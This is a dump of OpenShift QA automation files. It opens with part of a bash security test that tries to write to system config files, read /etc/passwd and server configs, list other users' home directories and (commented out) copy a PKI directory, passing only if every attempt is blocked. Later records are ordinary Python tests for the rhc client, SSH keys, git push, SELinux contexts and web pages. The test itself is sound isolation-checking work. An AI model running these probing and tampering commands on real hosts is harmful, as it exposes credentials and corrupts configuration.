$user_home\"\nuser_name=$(basename $user_home)\necho \"User name: $user_name\"\nuser_id=$(id -u $user_name)\necho \"User ID: $user_id\"\nlibra_version=$(/bin/rpm -qa | grep rhc)\necho \"Libra Verison on node: \"\necho \"$libra_version\"\necho \"\"\necho \"\"\necho \"\"\n\necho \"###Test Case###: Security - Write or modify libra important data\";\n\ncommand1=\"touch ${user_home}/git/write_x.git\"\necho \"Command 1: $command1\"\neval \"$command1\"\ncommand1_ret=$?\necho \"Command 1 return $command1_ret\"\necho \"\"\necho \"\"\necho \"\"\n\ncommand2_ret=0\nfor i in $(ls ${user_home}/*/conf.d/openshift.conf); do\n echo \"Command 2: echo xx >>$i\"\n echo \"xx\" >>$i\n tmp_ret=$?\n if [ $tmp_ret -eq 0 ]; then\n echo \"Scceed to write $i\"\n command2_ret=0\n break\n else\n command2_ret=1\n fi\ndone\necho \"Command 2 return $command2_ret\"\necho \"\"\necho \"\"\necho \"\"\n\n\ncommand3=\"echo xx >> /etc/mcollective/server.cfg\"\necho \"Command 3: $command3\"\neval \"$command3\"\ncommand3_ret=$?\necho \"Command 3 return $command3_ret\"\necho \"\"\necho \"\"\necho \"\"\n\ncommand5=\"echo xx >> /etc/mcollective/client.cfg\"\necho \"Command 5: $command5\"\neval \"$command5\"\ncommand5_ret=$?\necho \"Command 5 return $command5_ret\"\necho \"\"\necho \"\"\necho \"\"\n\ncommand6=\"echo xx >> /etc/openshift/resource_limits.conf\"\necho \"Command 6: $command6\"\neval \"$command6\"\ncommand6_ret=$?\necho \"Command 6 return $command6_ret\"\necho \"\"\necho \"\"\necho \"\"\n\ncommand7=\"echo xx >> /etc/qpidd.conf\"\necho \"Command 7: $command7\"\neval \"$command7\"\ncommand7_ret=$?\necho \"Command 7 return $command7_ret\"\necho \"\"\necho \"\"\necho \"\"\n\ncommand9=\"cat /etc/mcollective/server.cfg\"\necho \"Command 9: $command9\"\neval \"$command9\"\ncommand9_ret=$?\necho \"Command 9 return $command9_ret\"\necho \"\"\necho \"\"\necho \"\"\n\ncommand10=\"cat /etc/libra/node.conf\"\necho \"Command 10: $command10\"\neval 
\"$command10\"\ncommand10_ret=$?\necho \"Command 10 return $command10_ret\"\necho \"\"\necho \"\"\necho \"\"\n\ncommand11=\"ls /var/lib/openshift/\"\necho \"Command 11: $command11\"\neval \"$command11\"\ncommand11_ret=$?\necho \"Command 11 return $command11_ret\"\necho \"\"\necho \"\"\necho \"\"\n\ncommand12=\"touch /var/lib/openshift/com12_test\"\necho \"Command 12: $command12\"\neval \"$command12\"\ncommand12_ret=$?\necho \"Command 12 return $command12_ret\"\necho \"\"\necho \"\"\necho \"\"\n\ncommand13_ret=1\nfor i in $(grep 'libra guest' /etc/passwd | awk -F\":\" '{print $6}' | grep -v $user_name); do\n command=\"ls $i\"\n echo \"Command 13: $command\"\n eval \"$command\"\n tmp_ret=$?\n if [ $tmp_ret -eq 0 ]; then\n echo \"Scceed to read $i\"\n command13_ret=0\n break\n else\n command13_ret=1\n fi\ndone\necho \"Command 13 return $command13_ret\"\necho \"\"\necho \"\"\necho \"\"\n\ncommand14_ret=1\nfor i in $(grep 'libra guest' /etc/passwd | awk -F\":\" '{print $6}' | grep -v $user_name); do\n command=\"cd $i\"\n echo \"Command 14: $command\"\n eval \"$command\"\n tmp_ret=$?\n if [ $tmp_ret -eq 0 ]; then\n echo \"Scceed to excute $i\"\n command14_ret=0\n break\n else\n command14_ret=1\n fi\ndone\necho \"Command 14 return $command14_ret\"\necho \"\"\necho \"\"\necho \"\"\n\n\ncommand15_ret=1\nfor i in $(grep 'libra guest' /etc/passwd | awk -F\":\" '{print $6}' | grep -v $user_name); do\n command=\"stat $i\"\n echo \"Command: $command\"\n eval \"$command\"\n tmp_ret=$?\n if [ X\"$tmp_ret\" == X\"0\" ]; then\n command=\"stat $i | grep Uid | awk -F'(' '{print \\$2}' | awk -F')' '{print \\$1}' | cut -c4\"\n other_flag=$(eval \"$command\")\n echo \"Command 15: {$command} - {$other_flag}\"\n if [ X\"$other_flag\" != X\"0\" ]; then\n echo \"Dir - $i have some permisson for other user\"\n command15_ret=0\n break\n else\n command15_ret=1\n fi\n else\n echo \"stat operation to $i failed, skipping \"\n command15_ret=1\n fi\ndone\necho \"Command 15 return $command15_ret\"\necho \"\"\necho \"\"\necho \"\"\n\n\ncommand16=\"cat /etc/mcollective/client.cfg\"\necho \"Command 16: skip...\"\n#eval \"$command16\"\ncommand16_ret=1\necho \"Command 16 return $command16_ret\"\necho \"\"\necho \"\"\necho \"\"\n\ncommand17=\"cat /etc/qpidd.conf\"\necho \"Command 17: skip...\"\n#eval \"$command17\"\ncommand17_ret=1\necho \"Command 17 return $command17_ret\"\necho \"\"\necho \"\"\necho \"\"\n\ncommand18=\"cat /etc/qpid/qpidc.conf\"\necho \"Command 18: skip...\"\n#eval \"$command18\"\ncommand18_ret=1\necho \"Command 18 return $command18_ret\"\necho \"\"\necho \"\"\necho \"\"\n\ncommand19=\"echo xx >> /etc/qpid/qpidc.conf\"\necho \"Command 19: $command19\"\neval \"$command19\"\ncommand19_ret=$?\necho \"Command 19 return $command19_ret\"\necho \"\"\necho \"\"\necho \"\"\n\ncommand20=\"ls /etc/qpid/pki; cp -r /etc/qpid/pki ./; ls ./pki\"\necho \"Command20: skip...\"\n#eval \"$command20\"\n#line_count=$(ls ./pki | wc -l)\n#if [ ${line_count} -gt 0 ]; then \n# command20_ret=0\n#else \n# command20_ret=1\n#fi\ncommand20_ret=1\necho \"Command 20 return $command20_ret\"\necho \"\"\necho \"\"\necho \"\"\n\ncommand21=\"cat /etc/passwd\"\necho \"Command 21: $command21\"\neval \"$command21\"\ncommand21_ret=$?\necho \"Command 21 return $command21_ret\"\necho \"\"\necho \"\"\necho \"\"\n\nfor i in {1..21}; do \n eval ii=\"$\"command${i}_ret\n echo \"Command ${i} result: $ii\"\n if [ X\"$ii\" == X\"0\" ]; then\n result=\"FAIL\"\n break\n else\n result=\"PASS\"\n fi\ndone\n\n\necho \"###RESULT###: ${result}\"\n\n" }, { 
"alpha_fraction": 0.7368420958518982, "alphanum_fraction": 0.7368420958518982, "avg_line_length": 37, "blob_id": "d0272a8119d40e95e3f9602039c0d124a5d92493", "content_id": "9ad4b443c0c534ed81f6e646e7f5896b7517ce7e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 38, "license_type": "no_license", "max_line_length": 37, "num_lines": 1, "path": "/automation/open/testmodules/RT/quick_start/__init__.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "# place holder do we can do immports.\n" }, { "alpha_fraction": 0.5372806787490845, "alphanum_fraction": 0.5427631735801697, "avg_line_length": 30.379310607910156, "blob_id": "2e8817bad91de94486a37305c463c33f89bbb9f3", "content_id": "2a64f9690f7f19566169ca5782bb8457a0575545", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 912, "license_type": "no_license", "max_line_length": 75, "num_lines": 29, "path": "/automation/open/lib/common/web.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "from consts import *\nfrom misc import *\nimport OSConf\nimport re\n\ndef get_num_of_gears_by_web(app_name, app_type):\n \"\"\"\n Calls /env.* page with all of the env variables\n and seeks for OPENSHIFT_GEAR_DNS occurence.\n \"\"\"\n app_url = OSConf.get_app_url(app_name)\n url = app_url + \"/env\" + APP_SUFFIX[app_type.split('-')[0]]\n gears = list()\n #\n #we will seek for OPENSHIFT_GEAR_DNS\n #\n #pattern = re.compile(r\"^(OPENSHIFT_[\\w\\_]*GEAR_DNS.*)$\", re.MULTILINE)\n pattern = re.compile(r\"^(OPENSHIFT_GEAR_DNS.*)$\", re.MULTILINE)\n for i in range(7):\n for i in range(3):\n page = fetch_page(url)\n obj = pattern.search(page)\n if obj:\n gear = obj.group(1)\n if gear not in gears:\n log.info(\"GEAR: [%s]\"%gear)\n gears.append(gear)\n time.sleep(7)\n return len(gears)\n\n\n" }, { "alpha_fraction": 0.5046296119689941, "alphanum_fraction": 0.5122685432434082, "avg_line_length": 34.40983581542969, "blob_id": "9c4b729c038e87fe4a4d0f4afce26145fc01e2bc", "content_id": "8edfadb932b50be65f2f2285f95773655c450fdd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4320, "license_type": "no_license", "max_line_length": 172, "num_lines": 122, "path": "/automation/open/testmodules/RT/client/rhc_tail_files_options_jbossas.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\nimport os, sys\n\nWORK_DIR = os.path.dirname(os.path.abspath(__file__))\ntestdir = os.path.normpath(WORK_DIR + \"/../../../\")\nsys.path.append(testdir)\n\nimport testcase, common, OSConf, proc\nimport rhtest\nimport database\nimport time\nimport random\n# user defined packages\nimport openshift\n\n\nPASSED = rhtest.PASSED\nFAILED = rhtest.FAILED\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False\n\n def initialize(self):\n\tself.user_email = os.environ[\"OPENSHIFT_user_email\"]\n \tself.user_passwd = os.environ[\"OPENSHIFT_user_passwd\"]\n self.app_type = common.app_types[\"jbossas\"]\n self.app_name = \"jbossastail\"\n tcms_testcase_id=122408\n \tcommon.env_setup()\n \tself.steps_list = []\n\n def finalize(self):\n pass\ndef create_proc(cmd):\n return proc.Proc(cmd)\n\n\nclass RhcTailFilesOptionsJbossas(OpenShiftTest):\n def test_method(self):\n case = testcase.TestCase(\"[US504][rhc-cartridge]JBoss cartridge: tail/snapshot jboss application files\", [])\n step = dict()\n output = dict()\n # 1.Create an php app\n step[1] = 
testcase.TestCaseStep(\"1. Create an jbossas app\",\n common.create_app,\n function_parameters=[self.app_name, self.app_type, self.user_email, self.user_passwd],\n expect_description=\"the app should be created successfully\",\n expect_return=0\n )\n (retcode, output[1]) = step[1].run()\n\n count = 1 # recording the number of step\n\n option_lst = [ \"-o '-n 2'\",\n \"-o '-c 3'\",\n \"-o '-q'\",\n \"-f %s/logs/boot.log -o '-v'\" % (self.app_name),\n \"-o '--test'\",\n \"-o '-F'\",\n ]\n regex_lst = [ r\"boot.log.*\\n.*\\n.*\\n(?=\\n|$)\",\n r\"boot.log.*\\n.{2}\\n(?=\\n|$)\",\n r\"==> %s/logs/.*?.log\" % (self.app_name),\n r\"==> %s/logs/.*?.log\" % (self.app_name),\n r\"/usr/bin/tail: unrecognized option '--test'\",\n r\"%s/logs/boot.log\" % (self.app_name),\n ]\n for i in range(len(option_lst)):\n option = option_lst[i]\n regex = regex_lst[i]\n # 2.Run rhc tail in subprocess\n count += 1\n step[count] = testcase.TestCaseStep(\"%d.Run rhc tail in subprocess with option: '%s'\" % (count, option),\n create_proc,\n function_parameters=[\"rhc tail %s -l %s -p '%s' %s %s\" % (self.app_name, self.user_email, self.user_passwd, option, common.RHTEST_RHC_CLIENT_OPTIONS),],\n expect_description=\"rhc tail should be started\",\n )\n (retcode, output[count]) = step[count].run()\n p = retcode\n try:\n # 3.Check the option takes effect\n if i in (2,):\n exp_ret = 1\n else:\n exp_ret = 0\n count += 1\n step[count] = testcase.TestCaseStep(\"%d.Check if option: '%s' takes effect\" % (count, option),\n p.grep_output,\n function_parameters=[regex, 3, 5, 0],\n expect_description=\"Function should return %d\" % (exp_ret),\n expect_return=exp_ret\n )\n (retcode, output[count]) = step[count].run()\n finally:\n # 4.Kill the rhc tail subprocess\n count += 1\n step[count] = testcase.TestCaseStep(\"%d.Kill subprocess: rhc tail %s\" % (count, option),\n p.kill,\n function_parameters=[],\n expect_description=\"subprocess should be killed\",\n expect_return=0\n )\n (retcode, output[count]) = step[count].run()\n\n\t\n\t if retcode==0:\n\t return self.passed(\"%s passed\" % self.__class__.__name__)\n\t else:\n\t return self.failed(\"%s failed\" % self.__class__.__name__)\n\t\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(RhcTailFilesOptionsJbossas)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.5398760437965393, "alphanum_fraction": 0.5452479124069214, "avg_line_length": 32.15068435668945, "blob_id": "206395ed5b2cff85ba7c84012131006491a027c7", "content_id": "a5fdd91860fe046da0d39c118cd8d7be0dd449ba", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4840, "license_type": "no_license", "max_line_length": 104, "num_lines": 146, "path": "/automation/open/testmodules/RT/client/rsa_dsa_support.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "import os\nimport common, OSConf\nimport rhtest\nimport re\nimport shutil\n\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False\n\n def initialize(self):\n self.info(\"[US1608][BI] : Allow RSA and DSA SSH keys - CLI\")\n self.user_email = self.config.OPENSHIFT_user_email\n self.user_passwd = self.config.OPENSHIFT_user_passwd\n self.app_type = common.app_types[\"php\"]\n self.app_name = \"php\"+common.getRandomString(7)\n self.backup_dir = os.path.join(common.get_tmp_dir(),common.getRandomString(10))\n self.ssh_keyname=\"id_rsa\"\n self.ssh_key = 
os.path.join(os.path.expanduser(\"~\"),\".ssh\", self.ssh_keyname)\n common.env_setup()\n\n def finalize(self):\n self.revert_backup()\n common.update_sshkey()\n\n\nclass RsaDsaSupport(OpenShiftTest):\n \n def verify(self):\n url = OSConf.get_app_url(self.app_name)\n return common.grep_web_page(url+\"/index.php\", \"OpenShift\")\n\n def revert_backup(self):\n backup_key=os.path.join(self.backup_dir, self.ssh_keyname)\n if os.path.exists(backup_key) and os.path.exists(backup_key+\".pub\"):\n self.info(\"Reverting backup from %s...\"%self.backup_dir)\n os.remove(self.ssh_key)\n os.remove(self.ssh_key+\".pub\")\n os.rename(\"%s\"%backup_key, os.path.expanduser(\"~/.ssh/%s\"%self.ssh_keyname))\n os.rename(\"%s.pub\"%(backup_key), os.path.expanduser(\"~/.ssh/%s.pub\"%self.ssh_keyname))\n else:\n self.info(\"No revert due to missing backup!\")\n shutil.rmtree(self.backup_dir)\n\n return 0\n\n def do_backup(self):\n os.makedirs(self.backup_dir)\n self.info(\"Making backup into %s\"%self.backup_dir)\n if not os.path.exists(self.ssh_key):\n self.error(\"SSH key[%s] doesn't exist!\"%self.ssh_key)\n return 1\n try:\n os.rename(self.ssh_key, os.path.join(self.backup_dir, self.ssh_keyname))\n os.rename(self.ssh_key+\".pub\", os.path.join(self.backup_dir, self.ssh_keyname+\".pub\"))\n except Exception as e:\n import traceback\n traceback.print_exc()\n self.error(e)\n return 1\n return 0\n\n def gen_dsa_key(self):\n key_path=os.path.join(common.get_tmp_dir(), self.ssh_keyname)\n try:\n os.remove(key_path)\n except:\n pass\n cmd = \"ssh-keygen -t dsa -N '' -f %s \"%(key_path)\n r = common.cmd_get_status(cmd, quiet=True)\n if r == 0:\n os.rename(key_path, self.ssh_key)\n os.rename(key_path+\".pub\", self.ssh_key+\".pub\")\n return 0\n else:\n self.error(\"Unable to generate new DSA key\")\n return 1\n\n def verify_signature(self):\n f = open(self.ssh_key+\".pub\", 'r')\n key = f.read()\n f.close()\n if re.match(\"^ssh-dss\", key):\n return 0\n return 1\n\n def test_method(self):\n\n self.add_step(\"Backup .ssh/%s key \"%self.ssh_keyname,\n self.do_backup,\n expect_return=0)\n\n self.add_step(\"Create DSA key pair and do update\",\n self.gen_dsa_key,\n expect_return=0)\n\n self.add_step(\"Update the default ssh key\",\n common.update_sshkey,\n expect_return=0)\n\n self.add_step(\"Verify DSA signature\",\n self.verify_signature,\n expect_return=0)\n \n self.add_step(\"Create testing app\",\n common.create_app,\n function_parameters=[self.app_name, \n self.app_type, \n self.user_email, \n self.user_passwd, \n True],\n expect_return=0)\n\n self.add_step(\"Check new app url is available...\",\n self.verify, \n expect_return=0)\n\n self.add_step(\"Modify and push the application...\",\n self.modify_and_push,\n expect_return=0)\n\n self.run_steps()\n return self.passed(\"%s passed\" % self.__class__.__name__)\n\n def modify_and_push(self):\n test_file = os.path.join(\"php\",\"test.php\")\n common.write_file(os.path.join(self.app_name, test_file), \"<?php phpinfo(); ?>\")\n cmd = \"cd %s && git add %s && git commit -m 'test' -a && git push\" % (self.app_name, test_file),\n (status, output) = common.cmd_get_status_output(cmd)\n if (status == 0):\n return 0\n else:\n self.error(output)\n return 1\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(RsaDsaSupport)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.5929449796676636, "alphanum_fraction": 0.6031562089920044, "avg_line_length": 
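A minimal sketch of the verify_signature idea above (the helper name key_type is mine): an OpenSSH public key file begins with its type token, so telling DSA from RSA is a one-token read:\ndef key_type(pub_path):\n    # first whitespace-separated token, e.g. 'ssh-rsa' or 'ssh-dss'\n    with open(pub_path) as f:\n        return f.read().split()[0]\n# the test's verify_signature amounts to key_type(self.ssh_key + '.pub') == 'ssh-dss'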
38.16363525390625, "blob_id": "425c4581017513c9c864f6e3ebd6fa4b9f8dd409", "content_id": "4efd4950d40aa2d51726d57d2b2a62437163e410", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4309, "license_type": "no_license", "max_line_length": 141, "num_lines": 110, "path": "/automation/open/testmodules/RT/cartridge/git_push_upon_app_stopped.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\"\"\"\nJiangtao Zhao\[email protected]\nFeb 10, 2012\n[rhc-cartridge]Verify git push works well if stop app before git push\nhttps://tcms.engineering.redhat.com/case/122289/\n\"\"\"\n\nimport sys,os,commands,time,re\nimport rhtest\nimport testcase,common,OSConf\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False\n\n def initialize(self):\n self.summary = \"[rhc-cartridge]Verify git push works well if stop app before git push\"\n try:\n self.test_variant = self.config.test_variant\n except:\n self.test_variant = 'php'\n\n self.app_name = self.test_variant.split('-')[0] + 'uponstop'\n self.git_repo = \"./%s\" % (self.app_name)\n self.app_type = common.app_types[self.test_variant]\n tcms_testcase_id=122289\n common.env_setup()\n self.steps_list = []\n\n def finalize(self):\n pass\n\nclass GitPushUponAppStopped(OpenShiftTest):\n\n def test_method(self):\n\n # 1.Create an app\n self.steps_list.append( testcase.TestCaseStep(\"1. Create an %s app\" % (self.test_variant),\n common.create_app,\n function_parameters=[self.app_name, self.app_type, self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd],\n expect_description=\"the app should be created successfully\",\n expect_return=0))\n\n # Clean environment variable: SSH_AUTH_SOCK\n if os.environ.has_key(\"SSH_AUTH_SOCK\"):\n del os.environ[\"SSH_AUTH_SOCK\"]\n\n # 2.Stop Application\n self.steps_list.append( testcase.TestCaseStep(\"2. Stop Application\",\n \"rhc app stop %s -l %s -p '%s' %s\" \n % (self.app_name, self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd, common.RHTEST_RHC_CLIENT_OPTIONS),\n expect_description=\"App is stopped successfully\",\n expect_return=0))\n # 3.Check the app is unavailable via browser\n \n self.steps_list.append( testcase.TestCaseStep(\"3.Check the app is unavailable via browser\",\n common.grep_web_page,\n function_parameters=[OSConf.get_app_url_X(self.app_name), \"Service Temporarily Unavailable\", \"-H 'Pragma: no-cache'\", 3, 6],\n expect_description=\"The app is unavailable\",\n expect_return=0))\n\n # 4.Custom git hook file\n hook_file_path = \"%s/.openshift/action_hooks/build\" % (self.app_name)\n key_string = \"@@@testing@@@\"\n self.steps_list.append( testcase.TestCaseStep(\"4.Custom git hook file\",\n \"\"\"echo '\\necho \"%s\"' >> %s\"\"\" % (key_string, hook_file_path),\n expect_description=\"Added 1 line to %s\" % (hook_file_path),\n expect_return=0))\n\n # 5.Git push\n self.steps_list.append( testcase.TestCaseStep(\"5.Git push all the changes\",\n \"cd %s && git add . 
&& git commit -am t && git push\" % (self.git_repo),\n expect_description=\"Git push succeeds and '%s' should be found in the output\" % (key_string),\n expect_return=0,\n expect_string_list=[key_string]))\n\n # 6.Check to see if the app is still unavailable\n self.steps_list.append( testcase.TestCaseStep(\n \"6.Check to see if the app is still unavailable\",\n common.grep_web_page,\n function_parameters=[OSConf.get_app_url_X(self.app_name), \"Service Temporarily Unavailable\", \"-H 'Pragma: no-cache'\", 3, 6],\n expect_description=\"The app is still unavailable\",\n expect_return=0))\n\n case = testcase.TestCase(self.summary, self.steps_list)\n try:\n case.run()\n except testcase.TestCaseStepFail:\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\n if case.testcase_status == 'PASSED':\n return self.passed(\"%s passed\" % self.__class__.__name__)\n if case.testcase_status == 'FAILED':\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(GitPushUponAppStopped)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.6987179517745972, "alphanum_fraction": 0.7320512533187866, "avg_line_length": 25.89655113220215, "blob_id": "e7d5361416e205f0d852c8cefc4261459cfb25c3", "content_id": "fa856874614733b8d7887cd9628ede285c1d3545", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 780, "license_type": "no_license", "max_line_length": 116, "num_lines": 29, "path": "/automation/open/testmodules/RT/hot_deploy/ruby19_scaling_without_jenkins.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\n\"\"\"\nAttila Nagy\nAug 29, 2012\n\n\"\"\"\nimport rhtest\nimport common\nfrom ruby18_scaling_without_jenkins import Ruby18ScalingHotDeployWithoutJenkins\n\nclass Ruby19ScalingHotDeployWithoutJenkins(Ruby18ScalingHotDeployWithoutJenkins):\n \n def __init__(self, config):\n Ruby18ScalingHotDeployWithoutJenkins.__init__(self, config)\n self.config.application_type = common.app_types[\"ruby-1.9\"]\n self.config.summary = \"[US2443]Hot deployment support for scalable application - without Jenkins - ruby-1.9\"\n \nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(Ruby19ScalingHotDeployWithoutJenkins)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.5401146411895752, "alphanum_fraction": 0.5501432418823242, "avg_line_length": 31.080459594726562, "blob_id": "84ea52bf43358758e7ffb2520de98c6867ee1602", "content_id": "3634cf5e2fb57a263f309b2b1e8c75c7fbc2c95b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2792, "license_type": "no_license", "max_line_length": 296, "num_lines": 87, "path": "/automation/open/testmodules/RT/security/selinux_scan_files.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "\"\"\"\nLinqing Lu\[email protected]\nDec 23, 2011\n\n\"\"\"\n\nimport os \nimport sys\nimport rhtest\n\nimport testcase\nimport common\nimport commands\n\nclass OpenShiftTest(rhtest.Test):\n ITEST=\"DEV\"\n def initialize(self):\n self.summary=\"[integration][rhc-selinux]SELinux separation - scan context of files\"\n self.app_name = 'scanfile'\n self.app_type = 
common.app_types['php']\n\n common.env_setup()\n\n def finalize(self):\n os.system(\"rm -rf %s\"%(self.app_name))\n\nclass SelinuxScanFiles(OpenShiftTest):\n def test_method(self):\n # 1.Create an app\n self.info(\"Create a %s application\" %(self.app_type))\n ret = common.create_app(self.app_name, \n self.app_type, \n self.config.OPENSHIFT_user_email, \n self.config.OPENSHIFT_user_passwd, \n False)\n self.assert_equal(ret, 0, \"App should be created successfully\")\n\n # 2. Scan files\n self.info(\"Check file context\")\n ret=self.check_file_context()\n self.assert_equal(ret, 0) \n\n return self.passed(\"%s passed\" % self.__class__.__name__)\n\n def check_file_context(self):\n libra_fc=[['/etc/rc\\.d/init\\.d/libra','system_u:object_r:libra_initrc_exec_t:s0'],['/etc/rc\\.d/init\\.d/mcollective','system_u:object_r:libra_initrc_exec_t:s0'],['/var/lib/openshift/*','system_u:object_r:libra_var_lib_t:s0'],['/var/lib/openshift/*/.ssh','system_u:object_r:ssh_home_t:s0']]\n for libra_fc_rule in libra_fc:\n cmd='ls -Z %s'%(libra_fc_rule[0])\n (status, output) = common.run_remote_cmd_as_root(cmd)\n print output\n print \"------\"\n if status!=0:\n return 1\n for line in output.split('\\n'):\n if len(line.split())!=4 or ('lrwxrwxrwx.' in line):\n continue\n print line\n context_proc = line.split()[3]\n print context_proc\n context_rule = libra_fc_rule[1]\n print context_rule\n type_proc = context_proc.split(':')[2]\n type_rule = context_rule.split(':')[2]\n# if cmp(context_proc,context_rule)!=0:\n# print 'WARN:',context_proc,'differ from',context_rule\n if cmp(type_proc,type_rule)!=0:\n print 'WARN:',type_proc,'differ from',type_rule\n print line\n return 1\n return 0\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(SelinuxScanFiles)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.5965501666069031, "alphanum_fraction": 0.6181570291519165, "avg_line_length": 50.2279052734375, "blob_id": "649e30a32c1c8e221dbc76cf339afd290b63afcb", "content_id": "5f507aba6bc3b7be4e6ddc4d0870233c407ef04d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 11015, "license_type": "no_license", "max_line_length": 444, "num_lines": 215, "path": "/automation/open/testmodules/UI/web/case_165717.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# coding=utf-8\n#\n# File name: case_165717.py\n# Date: 2012/07/17 11:23\n# Author: [email protected] \n#\n\nimport rhtest\nimport time\n\nclass OpenShiftTest(rhtest.Test):\n def initialize(self):\n pass\n\n def finalize(self):\n pass\n\n\nclass CheckOpensourcePage(OpenShiftTest):\n def test_method(self):\n web = self.config.web\n\n \n #check with invalid password\n #web.go_to_home()\n web.go_to_community()\n web.click_element_by_xpath('''//a[contains(@href, '/community/open-source')]''')\n time.sleep(2)\n\n #check the \"OpenShift\" link \n web.click_element_by_xpath('''//div[@id='node-9475']/div/p/a''')\n time.sleep(2)\n web.assert_text_equal_by_xpath('''BUZZ''','''//body/div[2]/div/div/div/div/h2/strong''')\n web.go_back() \n #check the \"architecture-overview\" link \n web.click_element_by_xpath('''//div[@id='node-9475']/div/ul/li/a''')\n time.sleep(2)\n web.assert_text_equal_by_xpath('''Architecture Overview''','''//div[@id='content']/div/div/div/div[3]/div/section/div[2]/h2''') \n web.go_back() \n 
#check the \"Community Process\" link \n web.click_element_by_xpath('''//div[@id='node-9475']/div/ul[2]/li/a''')\n time.sleep(2)\n web.assert_text_equal_by_xpath('''Community Process''','''//div[@id='content']/div/div/div/div[3]/div/section/div[2]/h2''') \n web.go_back() \n #check the \"OpenShift Origin\" link \n web.click_element_by_xpath('''//div[@id='node-9475']/div/ul[2]/li[2]/a''')\n time.sleep(2)\n web.check_title(\"Browse:\") \n web.go_back() \n #check the \"Project Bug Reporting\" link \n web.click_element_by_xpath('''//div[@id='node-9475']/div/ul[2]/li[3]/a''')\n time.sleep(2)\n web.check_title(\"Log in to Red Hat Bugzilla\") \n web.go_back() \n #check the \"Git-hub\" link \n web.click_element_by_xpath('''//div[@id='node-9475']/div/ul[2]/li[4]/a''')\n time.sleep(4)\n web.assert_text_equal_by_xpath('''openshift''','''//body/div/div[2]/div/div/div/h1/span''') \n web.go_back()\n time.sleep(2)\n #check the \"Invitation for public review process for Cartridges\" link \n web.assert_text_equal_by_xpath(\"Invitation for public review process for Cartridges\",'''//div[@id='node-9475']/div/ul[3]/li/a''')\n web.click_element_by_link_text(\"Invitation for public review process for Cartridges\")\n time.sleep(2)\n web.assert_text_equal_by_xpath('''Invitation for public review process for Cartridges''','''//div[@id='content']/div/div/div/div[3]/div/section/div[2]/h2''') \n web.go_back()\n #check the \"Workflow for Cartridge review and inclusion\" link \n web.assert_text_equal_by_xpath(\"Workflow for Cartridge review and inclusion\",'''//div[@id='node-9475']/div/ul[3]/li[2]/a''')\n web.assert_text_equal_by_xpath(\"Workflow for Cartridge review and inclusion\",'''//a[contains(@href, '/community/node/add/wiki_page?edit[title]=Workflow+for+Cartridge+review+and+inclusion')]''')\n\n\n\n\n #check the \"Getting started with Openshift Origin LiveCD\" link \n web.assert_text_equal_by_xpath(\"Getting started with Openshift Origin LiveCD\",'''//div[@id='node-9475']/div/ul[4]/li/a''')\n web.click_element_by_link_text(\"Getting started with Openshift Origin LiveCD\")\n time.sleep(2)\n web.assert_text_equal_by_xpath('''Getting started with Openshift Origin LiveCD''','''//div[@id='content']/div/div/div/div[3]/div/section/div[2]/h2''') \n web.go_back()\n #check the \" Build Your Own Paas from the OpenShift Origin LiveCD using liveinst \" link \n web.assert_text_equal_by_xpath(\"Build Your Own Paas from the OpenShift Origin LiveCD using liveinst\",'''//div[@id='node-9475']/div/ul[4]/li[2]/a''')\n web.click_element_by_link_text(\"Build Your Own Paas from the OpenShift Origin LiveCD using liveinst\")\n time.sleep(2)\n web.assert_text_equal_by_xpath('''Build Your Own Paas from the OpenShift Origin LiveCD using liveinst''','''//div[@id='content']/div/div/div/div[3]/div/section/div[2]/h2''') \n web.go_back()\n #check the \"Connect to Openshift Origin installation with JBoss Tools\" link \n web.assert_text_equal_by_xpath(\"Connect to Openshift Origin installation with JBoss 